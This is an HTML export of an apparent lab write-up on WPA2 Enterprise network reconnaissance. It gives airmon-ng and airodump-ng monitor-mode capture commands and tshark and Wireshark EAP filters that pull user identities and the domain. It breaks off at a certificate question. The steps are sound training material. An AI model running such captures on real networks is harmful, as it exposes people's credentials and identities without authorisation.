<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>WPA2 Enterprise network</title><style>
/* cspell:disable-file */
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	padding-inline-start: 0;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

.page-description {
    margin-bottom: 2em;
}

.simple-table {
	margin-top: 1em;
	font-size: 0.875rem;
	empty-cells: show;
}
.simple-table td {
	height: 29px;
	min-width: 120px;
}

.simple-table th {
	height: 29px;
	min-width: 120px;
}

.simple-table-header-color {
	background: rgb(247, 246, 243);
	color: black;
}
.simple-table-header {
	font-weight: 500;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	max-height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code-wrap {
	white-space: pre-wrap;
	word-break: break-all;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark {
	text-decoration: none;
	max-height: 8em;
	padding: 0;
	display: flex;
	width: 100%;
	align-items: stretch;
}

.bookmark-title {
	font-size: 0.85em;
	overflow: hidden;
	text-overflow: ellipsis;
	height: 1.75em;
	white-space: nowrap;
}

.bookmark-text {
	display: flex;
	flex-direction: column;
}

.bookmark-info {
	flex: 4 1 180px;
	padding: 12px 14px 14px;
	display: flex;
	flex-direction: column;
	justify-content: space-between;
}

.bookmark-image {
	width: 33%;
	flex: 1 1 180px;
	display: block;
	position: relative;
	object-fit: cover;
	border-radius: 1px;
}

.bookmark-description {
	color: rgba(55, 53, 47, 0.6);
	font-size: 0.75em;
	overflow: hidden;
	max-height: 4.5em;
	word-break: break-word;
}

.bookmark-href {
	font-size: 0.75em;
	margin-top: 0.25em;
}

.sans { font-family: ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, ui-serif, serif; }
.mono { font-family: iawriter-mono, Nitti, Menlo, Courier, monospace; }
.pdf .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK JP'; }
.pdf:lang(zh-CN) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC'; }
.pdf:lang(zh-TW) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK TC'; }
.pdf:lang(ko-KR) .sans { font-family: Inter, ui-sans-serif, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK KR'; }
.pdf .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK JP'; }
.pdf:lang(zh-CN) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC'; }
.pdf:lang(zh-TW) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK TC'; }
.pdf:lang(ko-KR) .code { font-family: Source Code Pro, "SFMono-Regular", Menlo, Consolas, "PT Mono", "Liberation Mono", Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK KR'; }
.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK JP'; }
.pdf:lang(zh-CN) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK SC'; }
.pdf:lang(zh-TW) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK TC'; }
.pdf:lang(ko-KR) .serif { font-family: PT Serif, Lyon-Text, Georgia, ui-serif, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Serif CJK KR'; }
.pdf .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK JP'; }
.pdf:lang(zh-CN) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC'; }
.pdf:lang(zh-TW) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK TC'; }
.pdf:lang(ko-KR) .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK KR'; }
.highlight-default {
	color: rgba(55, 53, 47, 1);
}
.highlight-gray {
	color: rgba(120, 119, 116, 1);
	fill: rgba(120, 119, 116, 1);
}
.highlight-brown {
	color: rgba(159, 107, 83, 1);
	fill: rgba(159, 107, 83, 1);
}
.highlight-orange {
	color: rgba(217, 115, 13, 1);
	fill: rgba(217, 115, 13, 1);
}
.highlight-yellow {
	color: rgba(203, 145, 47, 1);
	fill: rgba(203, 145, 47, 1);
}
.highlight-teal {
	color: rgba(68, 131, 97, 1);
	fill: rgba(68, 131, 97, 1);
}
.highlight-blue {
	color: rgba(51, 126, 169, 1);
	fill: rgba(51, 126, 169, 1);
}
.highlight-purple {
	color: rgba(144, 101, 176, 1);
	fill: rgba(144, 101, 176, 1);
}
.highlight-pink {
	color: rgba(193, 76, 138, 1);
	fill: rgba(193, 76, 138, 1);
}
.highlight-red {
	color: rgba(212, 76, 71, 1);
	fill: rgba(212, 76, 71, 1);
}
.highlight-gray_background {
	background: rgba(241, 241, 239, 1);
}
.highlight-brown_background {
	background: rgba(244, 238, 238, 1);
}
.highlight-orange_background {
	background: rgba(251, 236, 221, 1);
}
.highlight-yellow_background {
	background: rgba(251, 243, 219, 1);
}
.highlight-teal_background {
	background: rgba(237, 243, 236, 1);
}
.highlight-blue_background {
	background: rgba(231, 243, 248, 1);
}
.highlight-purple_background {
	background: rgba(244, 240, 247, 0.8);
}
.highlight-pink_background {
	background: rgba(249, 238, 243, 0.8);
}
.highlight-red_background {
	background: rgba(253, 235, 236, 1);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(120, 119, 116, 1);
	fill: rgba(120, 119, 116, 1);
}
.block-color-brown {
	color: rgba(159, 107, 83, 1);
	fill: rgba(159, 107, 83, 1);
}
.block-color-orange {
	color: rgba(217, 115, 13, 1);
	fill: rgba(217, 115, 13, 1);
}
.block-color-yellow {
	color: rgba(203, 145, 47, 1);
	fill: rgba(203, 145, 47, 1);
}
.block-color-teal {
	color: rgba(68, 131, 97, 1);
	fill: rgba(68, 131, 97, 1);
}
.block-color-blue {
	color: rgba(51, 126, 169, 1);
	fill: rgba(51, 126, 169, 1);
}
.block-color-purple {
	color: rgba(144, 101, 176, 1);
	fill: rgba(144, 101, 176, 1);
}
.block-color-pink {
	color: rgba(193, 76, 138, 1);
	fill: rgba(193, 76, 138, 1);
}
.block-color-red {
	color: rgba(212, 76, 71, 1);
	fill: rgba(212, 76, 71, 1);
}
.block-color-gray_background {
	background: rgba(241, 241, 239, 1);
}
.block-color-brown_background {
	background: rgba(244, 238, 238, 1);
}
.block-color-orange_background {
	background: rgba(251, 236, 221, 1);
}
.block-color-yellow_background {
	background: rgba(251, 243, 219, 1);
}
.block-color-teal_background {
	background: rgba(237, 243, 236, 1);
}
.block-color-blue_background {
	background: rgba(231, 243, 248, 1);
}
.block-color-purple_background {
	background: rgba(244, 240, 247, 0.8);
}
.block-color-pink_background {
	background: rgba(249, 238, 243, 0.8);
}
.block-color-red_background {
	background: rgba(253, 235, 236, 1);
}
.select-value-color-uiBlue { background-color: rgba(35, 131, 226, .07); }
.select-value-color-pink { background-color: rgba(245, 224, 233, 1); }
.select-value-color-purple { background-color: rgba(232, 222, 238, 1); }
.select-value-color-green { background-color: rgba(219, 237, 219, 1); }
.select-value-color-gray { background-color: rgba(227, 226, 224, 1); }
.select-value-color-translucentGray { background-color: rgba(255, 255, 255, 0.0375); }
.select-value-color-orange { background-color: rgba(250, 222, 201, 1); }
.select-value-color-brown { background-color: rgba(238, 224, 218, 1); }
.select-value-color-red { background-color: rgba(255, 226, 221, 1); }
.select-value-color-yellow { background-color: rgba(253, 236, 200, 1); }
.select-value-color-blue { background-color: rgba(211, 229, 239, 1); }
.select-value-color-pageGlass { background-color: undefined; }
.select-value-color-washGlass { background-color: undefined; }

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="62467eed-f7ed-488b-bf60-3228d1748021" class="page sans"><header><h1 class="page-title">WPA2 Enterprise network</h1><p class="page-description"></p></header><div class="page-body"><p id="087db6f0-3291-4b9d-aa8e-db681905845f" class=""><strong>What is the domain of the users of the wifi-regional network?</strong></p><p id="74d990bd-01f8-4e9a-886b-b818048220cd" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="b3b3d32d-4720-4465-89c6-29b41c2a71b4" class="code"><code class="language-Bash">sudo airmon-ng check kill</code></pre><p id="92ae3e40-bf63-4048-8395-a9f1c2fbf9de" class="">
</p><p id="de335354-1b6a-4c30-8053-5305377f920f" class="">Next we should start monitor mode on wlan0 interface.</p><p id="2551d221-45d0-461f-a9ed-910a5ee72bd4" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="14c4a043-089f-4158-ad5e-e64bf563cc3a" class="code"><code class="language-Bash">sudo airmon-ng start wlan0</code></pre><p id="377e166c-9fe1-435f-b24f-591bcd6edf0a" class="">
</p><p id="87a0917d-7c59-4269-a3a8-ab24378f9bf9" class="">Now we should capture all traffic and list APs and clients. We should use the following arguments:</p><ul id="30356b1c-a731-4898-bb0a-83c365daf829" class="bulleted-list"><li style="list-style-type:disc"><code>-band abg</code> -&gt; to scan 2.4Ghz and 5Ghz.</li></ul><ul id="6f72301f-21e7-4927-8487-1c1e8b7e391f" class="bulleted-list"><li style="list-style-type:disc"><code>w scan</code> -&gt; write all data to a file.</li></ul><p id="615f9644-dbc0-484e-bf99-8e0cbf088a37" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="047eb04a-fbeb-4ac4-87a2-43effa8b7c80" class="code"><code class="language-Bash">sudo airodump-ng wlan0mon --band abg</code></pre><p id="877697ad-b468-45a3-b65a-ed621f6f0bba" class="">
</p><figure id="2eed8981-bc47-4740-8902-090a3efb8b1e" class="image"><a href="Untitled.png"><img style="width:890px" src="Untitled.png"/></a></figure><p id="fc0cab72-cfa2-4963-b645-44a65b9fb52f" class="">
</p><p id="f9ebbb13-e802-4947-8a69-e7a625f14941" class="">The WPA2 Enterprise networks can be identified with the value <code>MGT</code> in the colomn <code>AUTH</code>. There are several WPA2 Enterprise networks available in our environment. But we should focus on <code>wifi-regional</code>. This network is running on channel 44. All the information what we can identify, we should add to our notes. Now we should capture some network traffic on channel 44 and write it to a file.</p><p id="ac390674-6d5e-4d5b-88b7-28477ce45625" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="f8cdae4a-a5df-4ac7-a08a-277bf7a9c39e" class="code"><code class="language-Bash">sudo airodump-ng wlan0mon --band abg -c44 -w wifi-regional</code></pre><p id="5a800e69-4048-4ca8-bcfd-9f2bd58352ed" class="">
</p><figure id="01cd8a88-dd85-48c1-bf62-e21e96e4f14e" class="image"><a href="Untitled%201.png"><img style="width:900px" src="Untitled%201.png"/></a></figure><p id="7c5b77e4-0e6b-415a-a280-97d9a3c0e4dd" class="">
</p><p id="e1c44c66-3261-4851-80d3-646b32d68a8b" class="">By highlighting the target network we are able to see the workstations connection to our target network.</p><p id="d666d989-622d-47c6-8128-1fef12eca96a" class="">
</p><p id="509f6340-2bef-4fb5-9f12-32507b53ea85" class=""><strong>Wireshark</strong></p><p id="90f279c7-3f11-4891-bd9d-7b2290cc71d3" class="">Since we have captured some network traffic we could inspect the traffic with Wireshark.</p><p id="f83f26a2-22c0-44ce-bbd1-94b4be6bb0c2" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="7a846706-af49-4396-be37-25a3dd8fb3af" class="code"><code class="language-Bash">sudo wireshark wifi-regional-01.cap</code></pre><p id="65a8a710-6feb-4629-9550-1e5d671bd532" class="">
</p><p id="586d7377-00b1-48e9-a2c6-681af704c93d" class="">To make our life easier we should use some filters within Wireshark. There are three filters I used in this challenge.</p><p id="ea9c2b55-6849-4782-8c31-696a8e5fa61b" class="">Filter 1: All eap packages</p><p id="2999b64e-04f1-40ab-a6ca-324dc8ac0538" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="1f0606a9-b60c-4357-94bc-0b64d5435380" class="code"><code class="language-Bash">eap</code></pre><p id="db641cea-6f00-46e8-8037-32145d4e42bf" class="">
</p><p id="ab940d08-14a2-4d57-afd1-d54462a04ce9" class="">Filter 2: All eap packages for a specific Access Point.</p><p id="871b1913-7275-43f2-a796-323638204bf1" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="c64f8bd3-db9a-46d2-b1ab-6d3fe7f5eeb2" class="code"><code class="language-Bash">(eap) &amp;&amp; (wlan.ra == f0:9f:c2:7a:33:28)</code></pre><p id="6bc160c9-da30-4948-8f85-49ca1c97d518" class="">
</p><figure id="0cda9f40-f1d9-4db2-bbc8-9a2b748689f8" class="image"><a href="Untitled%202.png"><img style="width:997px" src="Untitled%202.png"/></a></figure><p id="06efc38d-718b-4ce5-b3fe-27c0fde7a3f5" class="">
</p><p id="ebbe5138-1139-4304-b47b-4583a30fc1de" class="">When the package is opened we have to search for the <code>Extensible Authentication Protocol</code>. In the field <code>Identity</code> we can find the domain name.</p><p id="13960dff-5961-4219-bd62-d99f8faaebe2" class="">
</p><p id="b24dcd93-1d7f-4ec8-bb26-912bc10f5f41" class=""><strong>Alternative with tshark</strong></p><p id="df9f7e11-c754-4034-80c9-8129a74bcdd0" class="">
</p><p id="6a1a7c9b-f7e7-4c56-9843-6c5616ff1dc2" class="">Everything we do with Wireshark can be done with tshark as well. The command below will use the monitor interface and capture data. To run this command we should be root.</p><p id="c72afd43-3501-4583-be7e-0e38bf381aed" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="4fd7b680-702c-4011-b15b-9a248f7826c9" class="code"><code class="language-Bash">tshark -Y &#x27;(eap &amp;&amp; wlan.ra == f0:9f:c2:7a:33:28) &amp;&amp; (eap.identity)&#x27;</code></pre><p id="4b036c42-52fc-4034-8f76-4495def39275" class="">
</p><p id="90258cdb-f707-4f83-aba8-44d58048f277" class="">
</p><p id="93f905f5-f3c4-46ed-8f2f-53575198b329" class="">The command below will show the data from a captured file</p><p id="45e8ceda-7c81-40a2-a090-003dc7f2bb1b" class="">
</p><script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/prism.min.js" integrity="sha512-7Z9J3l1+EYfeaPKcGXu3MS/7T+w19WtKQY/n+xzmw4hZhJ9tyYmcUS+4QqAlzhicE5LAfMQSF3iFTK9bQdTxXg==" crossorigin="anonymous" referrerPolicy="no-referrer"></script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.29.0/themes/prism.min.css" integrity="sha512-tN7Ec6zAFaVSG3TpNAKtk4DOHNpSwKHxxrsiw4GHKESGPs5njn/0sMCUMl2svV4wo4BK/rCP7juYz+zx+l6oeQ==" crossorigin="anonymous" referrerPolicy="no-referrer"/><pre id="2b86fa81-fad7-458f-a956-c0d7eddf6b90" class="code"><code class="language-Bash">root@WiFiChallengeLab:~# tshark -r wifi-regional-03.cap -Y &#x27;(eap &amp;&amp; wlan.ra == f0:9f:c2:7a:33:28) &amp;&amp; (eap.identity)&#x27;
Running as user &quot;root&quot; and group &quot;root&quot;. This could be dangerous.
11796  24.698944 IntelCor_bd:64:54 → Ubiquiti_7a:33:28 EAP 63 DOMAINNAME\anonymous Response, Identity
11873  24.741952 IntelCor_a9:de:55 → Ubiquiti_7a:33:28 EAP 63 DOMAINNAME\anonymous Response, Identity
55425 115.942656 IntelCor_a9:de:55 → Ubiquiti_7a:33:28 EAP 63 DOMAINNAME\anonymous Response, Identity
55440 115.946752 IntelCor_bd:64:54 → Ubiquiti_7a:33:28 EAP 63 DOMAINNAME\anonymous Response, Identity</code></pre><p id="32792a0c-ea9d-430d-8e7f-b9d357025525" class="">
</p><figure id="0e81803a-6144-4646-bab8-1af76c81f3f4" class="image"><a href="Untitled%203.png"><img style="width:1055px" src="Untitled%203.png"/></a></figure><p id="586a10ef-6abf-41d9-bcc4-a46cdc8db3e7" class="">
</p><p id="a1ab9ae0-4b49-46f6-a6d7-4eef1481a30a" class=""><strong>What is the email address of the server certificate?</strong></p><p id="883e3a26-e116-4a6c-970a-2585de9cf00c" class="">We have captured already some network traffic. We can use Wireshark or tshark to extract the data we need.</p><p id="46e73d4f-fa08-4eee-9481-8575100bdf89" class="">
</p><p id="8b49fcf3-5470-406d-ba81-b7d606957332" class=""><strong>Wireshark</strong></p><p id="c3497ece-5121-4ad1-bad8-60f2180380e0" class="">We can use Wireshark to identify some essental data for the certificates. The filter what we should use to find certificates is this:</p><p id="458f985b-5de8-4efb-9063-d4a324b4c5c4" class="">
